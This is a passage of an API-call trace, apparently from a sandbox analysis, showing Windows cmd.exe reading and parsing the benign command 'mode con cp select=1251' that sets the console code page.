[0065.514] _vsnwprintf (in: _Buffer=0x7ff6b42e7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x62afcff8d8 | out: _Buffer="\r\n") returned 2 [0065.514] _get_osfhandle (_FileHandle=1) returned 0x254 [0065.514] GetFileType (hFile=0x254) returned 0x3 [0065.514] _get_osfhandle (_FileHandle=1) returned 0x254 [0065.514] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0065.514] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6b42d9970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x62afcff8a8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesWritten=0x62afcff8a8*=0x2, lpOverlapped=0x0) returned 1 [0065.514] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6b42dbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0065.514] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x18f03e90080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0065.514] malloc (_Size=0x107ce) returned 0x18f03ea0060 [0065.515] _vsnwprintf (in: _Buffer=0x18f03ea0060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x62afcff8e8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0065.515] _vsnwprintf (in: _Buffer=0x18f03ea008e, _BufferCount=0x83ce, _Format="%c", _ArgList=0x62afcff8e8 | out: _Buffer=">") returned 1 [0065.515] _get_osfhandle (_FileHandle=1) returned 0x254 [0065.515] GetFileType (hFile=0x254) returned 0x3 [0065.515] _get_osfhandle (_FileHandle=1) returned 0x254 [0065.515] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Desktop>", lpUsedDefaultChar=0x0) returned 25 [0065.515] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6b42d9970*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x62afcff8d8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesWritten=0x62afcff8d8*=0x18, lpOverlapped=0x0) returned 1 [0065.515] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.515] GetFileType (hFile=0x248) returned 0x3 [0065.515] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.515] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.516] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.516] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c30, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0065.516] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.516] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.516] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.516] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c32, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0065.516] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.516] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.516] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.516] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c34, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0065.516] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.516] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.516] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.516] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c36, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0065.516] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.516] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.516] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.516] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c38, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0065.516] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.516] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.516] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.517] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c3a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0065.517] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.517] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.517] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.517] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c3c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0065.517] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.517] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.517] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.517] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c3e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0065.517] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.517] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.517] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.517] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c40, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0065.517] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.517] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.517] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.517] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c42, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0065.517] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.517] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.517] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.517] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c44, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0065.517] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.517] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.518] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.518] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c46, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0065.518] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.518] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.518] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.518] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c48, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0065.518] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.518] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.518] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.518] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c4a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0065.518] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.518] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.518] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.518] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c4c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0065.518] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.518] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.518] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.518] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c4e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0065.518] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.518] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.518] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.518] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c50, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0065.519] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.519] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.519] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.519] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c52, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0065.519] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.519] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.519] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.519] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c54, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0065.519] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.519] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.519] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.519] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c56, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0065.519] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.519] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.519] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.519] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c58, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0065.519] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.519] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.519] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.519] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c5a, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0065.519] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.519] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.519] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.520] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c5c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0065.520] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.520] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.520] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6b42d9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x62afcffc38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesRead=0x62afcffc38*=0x1, lpOverlapped=0x0) returned 1 [0065.520] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=1, lpWideCharStr=0x7ff6b42e3c5e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0065.520] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.520] GetFileType (hFile=0x248) returned 0x3 [0065.520] _get_osfhandle (_FileHandle=0) returned 0x248 [0065.521] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.521] _get_osfhandle (_FileHandle=1) returned 0x254 [0065.521] GetFileType (hFile=0x254) returned 0x3 [0065.521] _get_osfhandle (_FileHandle=1) returned 0x254 [0065.521] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x7ff6b42d9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25 [0065.521] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6b42d9970*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x62afcffbd8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6b42d9970*, lpNumberOfBytesWritten=0x62afcffbd8*=0x18, lpOverlapped=0x0) returned 1 [0065.521] GetProcessHeap () returned 0x18f03d90000 [0065.521] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0x4012) returned 0x18f03d98fe0 [0065.521] GetProcessHeap () returned 0x18f03d90000 [0065.521] RtlFreeHeap (HeapHandle=0x18f03d90000, Flags=0x0, BaseAddress=0x18f03d98fe0) returned 1 [0065.521] _wcsicmp (_String1="mode", _String2=")") returned 68 [0065.521] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0065.521] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0065.521] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0065.521] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0065.522] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0065.522] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0065.522] GetProcessHeap () returned 0x18f03d90000 [0065.522] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0xb0) returned 0x18f03d98320 [0065.522] GetProcessHeap () returned 0x18f03d90000 [0065.522] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0x1a) returned 0x18f03d96a80 [0065.522] GetProcessHeap () returned 0x18f03d90000 [0065.522] RtlAllocateHeap (HeapHandle=0x18f03d90000, Flags=0x8, Size=0x38) returned 0x18f03d91850 [0065.523] GetConsoleOutputCP () returned 0x1b5 [0066.343] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6b42dfbb0 | out: lpCPInfo=0x7ff6b42dfbb0) returned 1 [0066.343] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.971] GetConsoleTitleW (in: lpConsoleTitle=0x62afcffa20, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0069.617] malloc (_Size=0xffce) returned 0x18f03eb0840 [0069.617] ??_V@YAXPEAX@Z () returned 0x18f03eb0840 [0069.617] malloc (_Size=0xffce) returned 0x18f03ec0820 [0069.618] ??_V@YAXPEAX@Z () returned 0x18f03ec0820 [0069.618] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0069.618] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0069.618] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0069.618] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0069.618] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0069.618] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0069.618] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0069.618] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0069.618] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0069.618] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0069.618] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0069.618] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0069.618] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0069.618] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0069.618] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0069.618] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0069.618] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0069.618] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0069.619] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0069.619] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0069.619] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0069.619] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0069.619] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0069.619] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0069.619] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0069.619] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0069.619] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0069.619] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0069.619] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0069.619] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0069.619] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0069.619] _wcsicmp (_String1="mode", _String2="START") returned -6 [0069.619] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0069.619] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0069.619] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0069.619] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0069.619] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0069.619] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0069.619] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0069.619] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0069.619] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0069.619] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0069.619] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0069.619] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0069.619] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0069.619] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0069.619] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0069.619] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0069.619] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0069.619] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0069.619] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0069.619] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0069.619] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0069.620] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0069.620] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0069.620] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0069.620] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0069.620] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0069.620] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0069.620] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0069.620] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0069.620] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0069.620] 